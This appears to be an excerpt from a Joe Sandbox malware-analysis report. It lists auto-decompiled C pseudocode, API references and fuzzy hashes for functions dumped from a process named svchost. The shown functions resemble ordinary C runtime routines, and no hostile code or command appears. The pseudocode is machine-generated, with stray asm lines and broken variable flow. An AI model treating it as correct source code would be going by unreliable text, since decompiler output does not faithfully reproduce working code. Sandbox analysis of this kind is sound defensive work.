                            					_t14 = E00BC4C90(_t28,  &_v0, 0x1000);
                            					_t33 = _t32 + 0xc;
                            					__eflags = _t14;
                            					if(__eflags != 0) {
                            						__eflags = _a8192 ^ _t33;
                            						E00BC786A();
                            						return 1;
                            					} else {
                            						_push("Failed to convert executable path to UTF-8.");
                            						E00BC1910(__eflags);
                            						__eflags = _a8192 ^ _t33 + 0x00000004;
                            						E00BC786A();
                            						return 0;
                            					}
                            				} else {
                            					_push("Failed to get executable path.");
                            					_push("GetModuleFileNameW");
                            					E00BC1860(_t26, _t39);
                            					E00BC786A();
                            					return 0;
                            				}
                            			}

                            APIs
                            • GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00BC24BA,?,?), ref: 00BC27CC
                              • Part of subcall function 00BC1860: GetLastError.KERNEL32(?,?), ref: 00BC187D
                            Strings
                            • GetModuleFileNameW, xrefs: 00BC27DB
                            • Failed to convert executable path to UTF-8., xrefs: 00BC2817
                            • Failed to get executable path., xrefs: 00BC27D6
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ErrorFileLastModuleName
                            • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                            • API String ID: 2776309574-482168174
                            • Opcode ID: 64c71ba6037f09c1a550141163fac1c4efeba5a18d453994ca6984c925c467de
                            • Instruction ID: 582a38921a42148a775d8d27a2d6a69c6ef741ecdbd5427e0569ca26b0751884
                            • Opcode Fuzzy Hash: 64c71ba6037f09c1a550141163fac1c4efeba5a18d453994ca6984c925c467de
                            • Instruction Fuzzy Hash: E601D8716543405BF628F765AC8FFAB32D4EF94700F8008ADB609C6293FEB49944C697
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 75%
                            			E00BD4658(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
                            				signed int _v8;
                            				signed int _v12;
                            				signed int _v16;
                            				unsigned int _v20;
                            				signed int _v28;
                            				signed int _v32;
                            				signed int _v36;
                            				char _v40;
                            				intOrPtr _v48;
                            				char _v52;
                            				void* __ebx;
                            				void* __edi;
                            				void* _t86;
                            				signed int _t92;
                            				signed int _t93;
                            				signed int _t94;
                            				signed int _t100;
                            				void* _t101;
                            				void* _t102;
                            				void* _t104;
                            				void* _t107;
                            				void* _t109;
                            				void* _t111;
                            				void* _t115;
                            				char* _t116;
                            				void* _t119;
                            				signed int _t121;
                            				signed int _t128;
                            				signed int* _t129;
                            				signed int _t136;
                            				signed int _t137;
                            				char _t138;
                            				signed int _t139;
                            				signed int _t142;
                            				signed int _t146;
                            				signed int _t151;
                            				char _t156;
                            				char _t157;
                            				void* _t161;
                            				unsigned int _t162;
                            				signed int _t164;
                            				signed int _t166;
                            				signed int _t170;
                            				void* _t171;
                            				signed int* _t172;
                            				signed int _t174;
                            				signed int _t181;
                            				signed int _t182;
                            				signed int _t183;
                            				signed int _t184;
                            				signed int _t185;
                            				signed int _t186;
                            				signed int _t187;
                            
                            				_t171 = __edx;
                            				_t181 = _a24;
                            				if(_t181 < 0) {
                            					_t181 = 0;
                            				}
                            				_t184 = _a8;
                            				 *_t184 = 0;
                            				E00BCAFAE(0,  &_v52, _t171, _a36);
                            				_t5 = _t181 + 0xb; // 0xb
                            				if(_a12 > _t5) {
                            					_t172 = _a4;
                            					_t142 = _t172[1];
                            					_v36 =  *_t172;
                            					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
                            					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
                            						L11:
                            						__eflags = _t142 & 0x80000000;
                            						if((_t142 & 0x80000000) != 0) {
                            							 *_t184 = 0x2d;
                            							_t184 = _t184 + 1;
                            							__eflags = _t184;
                            						}
                            						__eflags = _a28;
                            						_v16 = 0x3ff;
                            						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
                            						__eflags = _t172[1] & 0x7ff00000;
                            						_v32 = _t136;
                            						_t86 = 0x30;
                            						if((_t172[1] & 0x7ff00000) != 0) {
                            							 *_t184 = 0x31;
                            							_t185 = _t184 + 1;
                            							__eflags = _t185;
                            						} else {
                            							 *_t184 = _t86;
                            							_t185 = _t184 + 1;
                            							_t164 =  *_t172 | _t172[1] & 0x000fffff;
                            							__eflags = _t164;
                            							if(_t164 != 0) {
                            								_v16 = 0x3fe;
                            							} else {
                            								_v16 = _v16 & _t164;
                            							}
                            						}
                            						_t146 = _t185;
                            						_t186 = _t185 + 1;
                            						_v28 = _t146;
                            						__eflags = _t181;
                            						if(_t181 != 0) {
                            							_t30 = _v48 + 0x88; // 0xffce8305
                            							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
                            						} else {
                            							 *_t146 = 0;
                            						}
                            						_t92 = _t172[1] & 0x000fffff;
                            						__eflags = _t92;
                            						_v20 = _t92;
                            						if(_t92 > 0) {
                            							L23:
                            							_t33 =  &_v8;
                            							 *_t33 = _v8 & 0x00000000;
                            							__eflags =  *_t33;
                            							_t147 = 0xf0000;
                            							_t93 = 0x30;
                            							_v12 = _t93;
                            							_v20 = 0xf0000;
                            							do {
                            								__eflags = _t181;
                            								if(_t181 <= 0) {
                            									break;
                            								}
                            								_t119 = E00BDF230( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                            								_t161 = 0x30;
                            								_t121 = _t119 + _t161 & 0x0000ffff;
                            								__eflags = _t121 - 0x39;
                            								if(_t121 > 0x39) {
                            									_t121 = _t121 + _t136;
                            									__eflags = _t121;
                            								}
                            								_t162 = _v20;
                            								_t172 = _a4;
                            								 *_t186 = _t121;
                            								_t186 = _t186 + 1;
                            								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
                            								_t147 = _t162 >> 4;
                            								_t93 = _v12 - 4;
                            								_t181 = _t181 - 1;
                            								_v20 = _t162 >> 4;
                            								_v12 = _t93;
                            								__eflags = _t93;
                            							} while (_t93 >= 0);
                            							__eflags = _t93;
                            							if(_t93 < 0) {
                            								goto L39;
                            							}
                            							_t115 = E00BDF230( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                            							__eflags = _t115 - 8;
                            							if(_t115 <= 8) {
                            								goto L39;
                            							}
                            							_t116 = _t186 - 1;
                            							_t138 = 0x30;
                            							while(1) {
                            								_t156 =  *_t116;
                            								__eflags = _t156 - 0x66;
                            								if(_t156 == 0x66) {
                            									goto L33;
                            								}
                            								__eflags = _t156 - 0x46;
                            								if(_t156 != 0x46) {
                            									_t139 = _v32;
                            									__eflags = _t116 - _v28;
                            									if(_t116 == _v28) {
                            										_t57 = _t116 - 1;
                            										 *_t57 =  *(_t116 - 1) + 1;
                            										__eflags =  *_t57;
                            									} else {
                            										_t157 =  *_t116;
                            										__eflags = _t157 - 0x39;
                            										if(_t157 != 0x39) {
                            											 *_t116 = _t157 + 1;
                            										} else {
                            											 *_t116 = _t139 + 0x3a;
                            										}
                            									}
                            									goto L39;
                            								}
                            								L33:
                            								 *_t116 = _t138;
                            								_t116 = _t116 - 1;
                            							}
                            						} else {
                            							__eflags =  *_t172;
                            							if( *_t172 <= 0) {
                            								L39:
                            								__eflags = _t181;
                            								if(_t181 > 0) {
                            									_push(_t181);
                            									_t111 = 0x30;
                            									_push(_t111);
                            									_push(_t186);
                            									E00BC8520(_t181);
                            									_t186 = _t186 + _t181;
                            									__eflags = _t186;
                            								}
                            								_t94 = _v28;
                            								__eflags =  *_t94;
                            								if( *_t94 == 0) {
                            									_t186 = _t94;
                            								}
                            								__eflags = _a28;
                            								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                            								_t174 = _a4[1];
                            								_t100 = E00BDF230( *_a4, 0x34, _t174);
                            								_t137 = 0;
                            								_t151 = (_t100 & 0x000007ff) - _v16;
                            								__eflags = _t151;
                            								asm("sbb ebx, ebx");
                            								if(__eflags < 0) {
                            									L47:
                            									 *(_t186 + 1) = 0x2d;
                            									_t187 = _t186 + 2;
                            									__eflags = _t187;
                            									_t151 =  ~_t151;
                            									asm("adc ebx, 0x0");
                            									_t137 =  ~_t137;
                            									goto L48;
                            								} else {
                            									if(__eflags > 0) {
                            										L46:
                            										 *(_t186 + 1) = 0x2b;
                            										_t187 = _t186 + 2;
                            										L48:
                            										_t182 = _t187;
                            										_t101 = 0x30;
                            										 *_t187 = _t101;
                            										__eflags = _t137;
                            										if(__eflags < 0) {
                            											L56:
                            											__eflags = _t187 - _t182;
                            											if(_t187 != _t182) {
                            												L60:
                            												_push(0);
                            												_push(0xa);
                            												_push(_t137);
                            												_push(_t151);
                            												_t102 = E00BDF150();
                            												_v32 = _t174;
                            												 *_t187 = _t102 + 0x30;
                            												_t187 = _t187 + 1;
                            												__eflags = _t187;
                            												L61:
                            												_t104 = 0x30;
                            												_t183 = 0;
                            												__eflags = 0;
                            												 *_t187 = _t151 + _t104;
                            												 *(_t187 + 1) = 0;
                            												goto L62;
                            											}
                            											__eflags = _t137;
                            											if(__eflags < 0) {
                            												goto L61;
                            											}
                            											if(__eflags > 0) {
                            												goto L60;
                            											}
                            											__eflags = _t151 - 0xa;
                            											if(_t151 < 0xa) {
                            												goto L61;
                            											}
                            											goto L60;
                            										}
                            										if(__eflags > 0) {
                            											L51:
                            											_push(0);
                            											_push(0x3e8);
                            											_push(_t137);
                            											_push(_t151);
                            											_t107 = E00BDF150();
                            											_v32 = _t174;
                            											 *_t187 = _t107 + 0x30;
                            											_t187 = _t187 + 1;
                            											__eflags = _t187 - _t182;
                            											if(_t187 != _t182) {
                            												L55:
                            												_push(0);
                            												_push(0x64);
                            												_push(_t137);
                            												_push(_t151);
                            												_t109 = E00BDF150();
                            												_v32 = _t174;
                            												 *_t187 = _t109 + 0x30;
                            												_t187 = _t187 + 1;
                            												__eflags = _t187;
                            												goto L56;
                            											}
                            											L52:
                            											__eflags = _t137;
                            											if(__eflags < 0) {
                            												goto L56;
                            											}
                            											if(__eflags > 0) {
                            												goto L55;
                            											}
                            											__eflags = _t151 - 0x64;
                            											if(_t151 < 0x64) {
                            												goto L56;
                            											}
                            											goto L55;
                            										}
                            										__eflags = _t151 - 0x3e8;
                            										if(_t151 < 0x3e8) {
                            											goto L52;
                            										}
                            										goto L51;
                            									}
                            									__eflags = _t151;
                            									if(_t151 < 0) {
                            										goto L47;
                            									}
                            									goto L46;
                            								}
                            							}
                            							goto L23;
                            						}
                            					}
                            					__eflags = 0;
                            					if(0 != 0) {
                            						goto L11;
                            					} else {
                            						_t183 = E00BD495B(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
                            						__eflags = _t183;
                            						if(_t183 == 0) {
                            							_t128 = E00BC87B0(_t184, 0x65);
                            							_pop(_t166);
                            							__eflags = _t128;
                            							if(_t128 != 0) {
                            								__eflags = _a28;
                            								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                            								__eflags = _t170;
                            								 *_t128 = _t170;
                            								 *((char*)(_t128 + 3)) = 0;
                            							}
                            							_t183 = 0;
                            						} else {
                            							 *_t184 = 0;
                            						}
                            						goto L62;
                            					}
                            				} else {
                            					_t129 = E00BCC9CE();
                            					_t183 = 0x22;
                            					 *_t129 = _t183;
                            					E00BD1788();
                            					L62:
                            					if(_v40 != 0) {
                            						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
                            					}
                            					return _t183;
                            				}
                            			}


                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: __alldvrm$_strrchr
                            • String ID:
                            • API String ID: 1036877536-0
                            • Opcode ID: 2dfccee33d1e5e66d80ff58c22bb23c19375d490210077c4cf8c0c7b90620e05
                            • Instruction ID: c50bb584b5063c146eea2d108769c43b03df65859e4f7d324771ca81a86585ab
                            • Opcode Fuzzy Hash: 2dfccee33d1e5e66d80ff58c22bb23c19375d490210077c4cf8c0c7b90620e05
                            • Instruction Fuzzy Hash: BEA144729002869FEB218F28C8917AEFBE1EF52350F1841EFE5959B382E7398D41C750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00BCCBFB(signed int __edx, intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr* _a16) {
                            				signed int _v8;
                            				intOrPtr _v16;
                            				intOrPtr _v28;
                            				intOrPtr _v32;
                            				intOrPtr _v36;
                            				intOrPtr _v40;
                            				intOrPtr _v44;
                            				void _v48;
                            				char _v64;
                            				void _v72;
                            				long _v76;
                            				intOrPtr _v80;
                            				char _v84;
                            				void* __ebx;
                            				signed int _t53;
                            				intOrPtr _t66;
                            				signed int _t68;
                            				int _t70;
                            				signed int _t81;
                            				signed int _t83;
                            				signed int _t85;
                            				intOrPtr _t98;
                            				signed int _t104;
                            				signed int _t109;
                            				signed int _t111;
                            				signed int _t118;
                            				void* _t121;
                            				intOrPtr* _t128;
                            				signed int _t130;
                            				intOrPtr _t140;
                            
                            				_t118 = __edx;
                            				_t53 =  *0xbec008; // 0xdc55bb75
                            				_v8 = _t53 ^ _t130;
                            				_t128 = _a16;
                            				_t121 = _a12;
                            				_v80 = _a4;
                            				_v76 = _t121;
                            				_t104 = GetFileType(_t121) & 0xffff7fff;
                            				if(_t104 != 1) {
                            					__eflags = _t104 - 2;
                            					if(_t104 == 2) {
                            						L16:
                            						__eflags = _t104 - 2;
                            						 *((short*)(_t128 + 6)) = ((0 | _t104 != 0x00000002) - 0x00000001 & 0x00001000) + 0x1000;
                            						 *((short*)(_t128 + 8)) = 1;
                            						_t66 = _a8;
                            						 *((intOrPtr*)(_t128 + 0x10)) = _t66;
                            						 *_t128 = _t66;
                            						__eflags = _t104 - 2;
                            						if(_t104 != 2) {
                            							_t70 = PeekNamedPipe(_t121, 0, 0, 0,  &_v76, 0);
                            							__eflags = _t70;
                            							if(_t70 != 0) {
                            								 *((intOrPtr*)(_t128 + 0x14)) = _v76;
                            							}
                            						}
                            						_t68 = 1;
                            						__eflags = 1;
                            						L20:
                            						E00BC786A();
                            						return _t68;
                            					}
                            					__eflags = _t104 - 3;
                            					if(_t104 == 3) {
                            						goto L16;
                            					}
                            					__eflags = _t104;
                            					if(_t104 != 0) {
                            						L15:
                            						E00BCC998(GetLastError());
                            						L14:
                            						_t68 = 0;
                            						goto L20;
                            					}
                            					 *((intOrPtr*)(E00BCC9CE())) = 9;
                            					goto L14;
                            				}
                            				 *((short*)(_t128 + 8)) = 1;
                            				_t74 = _v80;
                            				if(_v80 == 0) {
                            					L4:
                            					_t109 = 0xa;
                            					memset( &_v48, 0, _t109 << 2);
                            					if(E00BD38BB(0, _t140, _v76, 0,  &_v48, 0x28) == 0) {
                            						goto L15;
                            					}
                            					 *((short*)(_t128 + 6)) = E00BCCF2D(0, _v16, _v80);
                            					_t81 = E00BCCDB3(_v32, _v28, 0, 0);
                            					 *(_t128 + 0x20) = _t81;
                            					 *(_t128 + 0x24) = _t118;
                            					if((_t81 & _t118) == 0xffffffff) {
                            						goto L14;
                            					}
                            					_t24 = _t128 + 0x20; // 0x83cc758d
                            					_t83 = E00BCCDB3(_v40, _v36,  *_t24, _t118);
                            					 *(_t128 + 0x18) = _t83;
                            					 *(_t128 + 0x1c) = _t118;
                            					if((_t83 & _t118) == 0xffffffff) {
                            						goto L14;
                            					}
                            					_t29 = _t128 + 0x24; // 0xcb830cc4
                            					_t30 = _t128 + 0x20; // 0x83cc758d
                            					_t85 = E00BCCDB3(_v48, _v44,  *_t30,  *_t29);
                            					 *(_t128 + 0x28) = _t85;
                            					 *(_t128 + 0x2c) = _t118;
                            					_t144 = (_t85 & _t118) - 0xffffffff;
                            					if((_t85 & _t118) == 0xffffffff) {
                            						goto L14;
                            					}
                            					_t111 = 6;
                            					memset( &_v72, 0, _t111 << 2);
                            					if(E00BD38BB(0, _t144, _v76, 1,  &_v72, 0x18) == 0) {
                            						goto L15;
                            					}
                            					_t39 = _t128 + 0x14; // 0xbccb3d
                            					_t68 = E00BCCEFB( &_v64, _t39) & 0xffffff00 | _t95 != 0x00000000;
                            					goto L20;
                            				}
                            				_v84 = 0;
                            				if(E00BCCF93(_t74,  &_v84) == 0) {
                            					goto L14;
                            				}
                            				_t98 = _v84 - 1;
                            				_t140 = _t98;
                            				 *((intOrPtr*)(_t128 + 0x10)) = _t98;
                            				 *_t128 = _t98;
                            				goto L4;
                            			}


                            APIs
                            • GetFileType.KERNEL32(?,?,00000000,00000000), ref: 00BCCC20
                              • Part of subcall function 00BCCF93: __dosmaperr.LIBCMT ref: 00BCCFD6
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BCCB29), ref: 00BCCD4B
                            • __dosmaperr.LIBCMT ref: 00BCCD52
                            • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00BCCD8F
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: __dosmaperr$ErrorFileLastNamedPeekPipeType
                            • String ID:
                            • API String ID: 3955570002-0
                            • Opcode ID: f394a0604df45b45da60c29c8642a64fa1ffb7d7d306d9b5e0063e159d6fd88f
                            • Instruction ID: e9b46a2f8cf11b53259e913c3f8b379091bb73f3fe4e20c5d45db6fd7413b7b7
                            • Opcode Fuzzy Hash: f394a0604df45b45da60c29c8642a64fa1ffb7d7d306d9b5e0063e159d6fd88f
                            • Instruction Fuzzy Hash: 5551A172900608AFDB14DFB8CC41EAEBFF9EF18310B14857DE55AD7260EB7099459B50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 94%
                            			E00BDCE51(signed int __edx, intOrPtr _a4, intOrPtr _a8, int _a12) {
                            				int _v8;
                            				intOrPtr _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				signed int _t16;
                            				signed int _t17;
                            				int _t20;
                            				signed int _t21;
                            				int _t23;
                            				signed int _t25;
                            				int _t28;
                            				intOrPtr* _t30;
                            				int _t34;
                            				int _t35;
                            				void* _t36;
                            				intOrPtr* _t37;
                            				intOrPtr* _t38;
                            				int _t46;
                            				void* _t54;
                            				void* _t56;
                            				signed int _t58;
                            				int _t61;
                            				int _t63;
                            				void* _t64;
                            				void* _t65;
                            				void* _t66;
                            
                            				_t58 = __edx;
                            				_t59 = _a4;
                            				_t61 = 0;
                            				_t16 = E00BD2807(_a4, 0, 0, 1);
                            				_v20 = _t16;
                            				_v16 = __edx;
                            				_t65 = _t64 + 0x10;
                            				if((_t16 & __edx) != 0xffffffff) {
                            					_t17 = E00BD2807(_t59, 0, 0, 2);
                            					_t66 = _t65 + 0x10;
                            					_t51 = _t17 & __edx;
                            					__eflags = (_t17 & __edx) - 0xffffffff;
                            					if((_t17 & __edx) == 0xffffffff) {
                            						goto L1;
                            					}
                            					_t46 = _a8 - _t17;
                            					__eflags = _t46;
                            					_t20 = _a12;
                            					asm("sbb eax, edx");
                            					_v8 = _t20;
                            					if(__eflags < 0) {
                            						L24:
                            						__eflags = _t20 - _t61;
                            						if(__eflags > 0) {
                            							L19:
                            							_t21 = E00BD2807(_t59, _v20, _v16, _t61);
                            							__eflags = (_t21 & _t58) - 0xffffffff;
                            							if((_t21 & _t58) != 0xffffffff) {
                            								_t23 = 0;
                            								__eflags = 0;
                            								L31:
                            								return _t23;
                            							}
                            							L20:
                            							_t23 =  *((intOrPtr*)(E00BCC9CE()));
                            							goto L31;
                            						}
                            						if(__eflags < 0) {
                            							L27:
                            							_t25 = E00BD2807(_t59, _a8, _a12, _t61);
                            							_t66 = _t66 + 0x10;
                            							__eflags = (_t25 & _t58) - 0xffffffff;
                            							if((_t25 & _t58) == 0xffffffff) {
                            								goto L20;
                            							}
                            							_t28 = SetEndOfFile(E00BCE926(_t59));
                            							__eflags = _t28;
                            							if(_t28 != 0) {
                            								goto L19;
                            							}
                            							 *((intOrPtr*)(E00BCC9CE())) = 0xd;
                            							_t30 = E00BCC9BB();
                            							 *_t30 = GetLastError();
                            							goto L20;
                            						}
                            						__eflags = _t46 - _t61;
                            						if(_t46 >= _t61) {
                            							goto L19;
                            						}
                            						goto L27;
                            					}
                            					if(__eflags > 0) {
                            						L6:
                            						_t63 = E00BD0B10(_t51, 0x1000, 1);
                            						_pop(_t54);
                            						__eflags = _t63;
                            						if(_t63 != 0) {
                            							_v12 = E00BCD960(_t54, _t59, 0x8000);
                            							_t34 = _v8;
                            							_pop(_t56);
                            							do {
                            								__eflags = _t34;
                            								if(__eflags < 0) {
                            									L13:
                            									_t35 = _t46;
                            									L14:
                            									_t36 = E00BD308B(_t59, _t63, _t35);
                            									_t66 = _t66 + 0xc;
                            									__eflags = _t36 - 0xffffffff;
                            									if(_t36 == 0xffffffff) {
                            										_t37 = E00BCC9BB();
                            										__eflags =  *_t37 - 5;
                            										if( *_t37 == 5) {
                            											 *((intOrPtr*)(E00BCC9CE())) = 0xd;
                            										}
                            										L23:
                            										_t38 = E00BCC9CE();
                            										E00BD09EB(_t63);
                            										_t23 =  *_t38;
                            										goto L31;
                            									}
                            									asm("cdq");
                            									_t46 = _t46 - _t36;
                            									_t34 = _v8;
                            									asm("sbb eax, edx");
                            									_v8 = _t34;
                            									__eflags = _t34;
                            									if(__eflags > 0) {
                            										L12:
                            										_t35 = 0x1000;
                            										goto L14;
                            									}
                            									if(__eflags < 0) {
                            										break;
                            									}
                            									goto L17;
                            								}
                            								if(__eflags > 0) {
                            									goto L12;
                            								}
                            								__eflags = _t46 - 0x1000;
                            								if(_t46 < 0x1000) {
                            									goto L13;
                            								}
                            								goto L12;
                            								L17:
                            								__eflags = _t46;
                            							} while (_t46 != 0);
                            							E00BCD960(_t56, _t59, _v12);
                            							E00BD09EB(_t63);
                            							_t66 = _t66 + 0xc;
                            							_t61 = 0;
                            							__eflags = 0;
                            							goto L19;
                            						}
                            						 *((intOrPtr*)(E00BCC9CE())) = 0xc;
                            						goto L23;
                            					}
                            					__eflags = _t46;
                            					if(_t46 <= 0) {
                            						goto L24;
                            					}
                            					goto L6;
                            				}
                            				L1:
                            				return  *((intOrPtr*)(E00BCC9CE()));
                            			}






























                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: _free
                            • String ID:
                            • API String ID: 269201875-0
                            • Opcode ID: 3ed2eb14e085e04a71be2fd7e66939f97af101bae58caf66e93b8d8181cc0d62
                            • Instruction ID: 6c6ead3a4e42ba2941cfce1586f49ed59c1afe2312f8a0d904199670d82ea225
                            • Opcode Fuzzy Hash: 3ed2eb14e085e04a71be2fd7e66939f97af101bae58caf66e93b8d8181cc0d62
                            • Instruction Fuzzy Hash: 7E413B72A001026BDB256B788C81BEEBEE6DF11730F2406E7F419D6392F6744945D361
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 83%
                            			E00BD8041(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                            				signed int _v8;
                            				int _v12;
                            				char _v16;
                            				intOrPtr _v24;
                            				char _v28;
                            				void* _v40;
                            				void* __ebx;
                            				void* __edi;
                            				signed int _t34;
                            				signed int _t40;
                            				int _t45;
                            				int _t52;
                            				void* _t53;
                            				void* _t55;
                            				int _t57;
                            				signed int _t63;
                            				int _t67;
                            				short* _t71;
                            				signed int _t72;
                            				short* _t73;
                            
                            				_t34 =  *0xbec008; // 0xdc55bb75
                            				_v8 = _t34 ^ _t72;
                            				_push(_t53);
                            				E00BCAFAE(_t53,  &_v28, __edx, _a4);
                            				_t57 = _a24;
                            				if(_t57 == 0) {
                            					_t52 =  *(_v24 + 8);
                            					_t57 = _t52;
                            					_a24 = _t52;
                            				}
                            				_t67 = 0;
                            				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                            				_v12 = _t40;
                            				if(_t40 == 0) {
                            					L15:
                            					if(_v16 != 0) {
                            						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                            					}
                            					E00BC786A();
                            					return _t67;
                            				}
                            				_t55 = _t40 + _t40;
                            				asm("sbb eax, eax");
                            				if((_t55 + 0x00000008 & _t40) == 0) {
                            					_t71 = 0;
                            					L11:
                            					if(_t71 != 0) {
                            						E00BC8520(_t67, _t71, _t67, _t55);
                            						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
                            						if(_t45 != 0) {
                            							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
                            						}
                            					}
                            					L14:
                            					E00BD815E(_t71);
                            					goto L15;
                            				}
                            				asm("sbb eax, eax");
                            				_t47 = _t40 & _t55 + 0x00000008;
                            				_t63 = _t55 + 8;
                            				if((_t40 & _t55 + 0x00000008) > 0x400) {
                            					asm("sbb eax, eax");
                            					_t71 = E00BD0A25(_t63, _t47 & _t63);
                            					if(_t71 == 0) {
                            						goto L14;
                            					}
                            					 *_t71 = 0xdddd;
                            					L9:
                            					_t71 =  &(_t71[4]);
                            					goto L11;
                            				}
                            				asm("sbb eax, eax");
                            				E00BDF250();
                            				_t71 = _t73;
                            				if(_t71 == 0) {
                            					goto L14;
                            				}
                            				 *_t71 = 0xcccc;
                            				goto L9;
                            			}
























                            APIs
                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00BD3E2E,?,00000000,?,00000001,?,?,00000001,00BD3E2E,?), ref: 00BD808E
                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00BD8117
                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00BD0C3C,?), ref: 00BD8129
                            • __freea.LIBCMT ref: 00BD8132
                              • Part of subcall function 00BD0A25: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BD80E5,00000000,?,00BD0C3C,?,00000008,?,00BD3E2E,?,?,?), ref: 00BD0A57
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                            • String ID:
                            • API String ID: 2652629310-0
                            • Opcode ID: 141b9859d7be71f55c451d729b0c3dac7df6d9fd0f49340d7b746489b3d636af
                            • Instruction ID: 16b1440edb65b3e5e68e8f899df920dc3b13b6251efc60322de6fd70cbe0a72b
                            • Opcode Fuzzy Hash: 141b9859d7be71f55c451d729b0c3dac7df6d9fd0f49340d7b746489b3d636af
                            • Instruction Fuzzy Hash: F431E172A1020AABDF25DF65DC81EAEBBE5EB44311F0441AAFC04EB250EB35CD55CB90
                            Uniqueness

